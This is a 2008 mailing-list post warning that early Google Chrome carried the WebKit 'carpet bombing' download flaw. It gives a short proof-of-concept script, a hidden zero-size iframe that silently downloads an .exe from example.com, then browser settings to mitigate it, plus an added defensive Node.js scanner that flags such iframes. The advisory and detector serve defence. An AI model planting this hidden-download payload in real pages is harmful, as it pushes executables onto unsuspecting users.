LUG: Google Chrome browser 0-day exploit!

Jim Cuzella jcuzella at mines.edu
Fri Sep 5 11:31:44 MDT 2008


For those of you that may be experimenting with the new and exciting
Google Chrome browser: Beware!
As Kevin informed me last night, it uses a vulnerable version of WebKit
(525.13), which contains the "carpet bombing" flaw found earlier in Safari.

For more information see here:
http://blogs.zdnet.com/security/?p43

The proof of concept is surprisingly simple:

<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

While Google is working on a workaround patch, the following steps may
be taken to prevent you from getting pwnt:

1. Click on the wrench in Chrome's upper right corner.

2. Click OPTIONS on the dropdown menu.

3. Check the box labeled "Ask where to save each file before downloading."

The vulnerability will still exist, however you will now be prompted for
every download.

Cheers,
- Jim C.
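
Added example, not part of the original post: a small Node.js scanner that a proxy or mail-gateway filter could run over page source to flag iframes whose src points at an executable, as in the snippet above, and to mark those that are also hidden. The function names, the extension list and the sample markup are assumptions made for this illustration.

```javascript
// Added example, not from the original post. Extension list is an assumption.
const RISKY_EXT = new Set(['exe', 'scr', 'msi', 'bat', 'cmd', 'com', 'pif', 'jar', 'vbs']);

// Pull name=value pairs out of one tag (quoted or bare values).
function parseAttrs(tag) {
  const attrs = {};
  const re = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(tag)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Zero or one pixel in both dimensions, or hidden through inline style.
function isHidden(a) {
  const tiny = (v) => v !== undefined && /^\s*[01](px)?\s*$/i.test(v);
  const style = (a.style || '').replace(/\s+/g, '').toLowerCase();
  return (tiny(a.width) && tiny(a.height)) ||
    style.includes('display:none') || style.includes('visibility:hidden');
}

// Extension of the URL path only, so query strings do not hide it.
function riskyExt(src) {
  let path;
  try { path = new URL(src, 'http://base.invalid/').pathname; } catch { return null; }
  const m = /\.([a-z0-9]+)$/i.exec(path);
  return m && RISKY_EXT.has(m[1].toLowerCase()) ? m[1].toLowerCase() : null;
}

// Scans raw text, so tags inside document.write('...') strings are seen too.
function findDownloadFrames(html) {
  const findings = [];
  for (const m of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const a = parseAttrs(m[0]);
    const ext = a.src ? riskyExt(a.src) : null;
    if (ext) findings.push({ src: a.src, ext, hidden: isHidden(a) });
  }
  return findings;
}

// Constructed sample: the post's snippet, a benign frame, a style-hidden variant.
const SAMPLE = `
<script>document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');</script>
<iframe src="/docs/help.html" width="0" height="0"></iframe>
<IFRAME style="display: none" src='/files/setup.EXE?id=7'></IFRAME>`;
console.log(findDownloadFrames(SAMPLE));
```

The check is a heuristic: a server can return an attachment from a URL with any extension, so the "ask where to save" setting described above remains the actual control.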
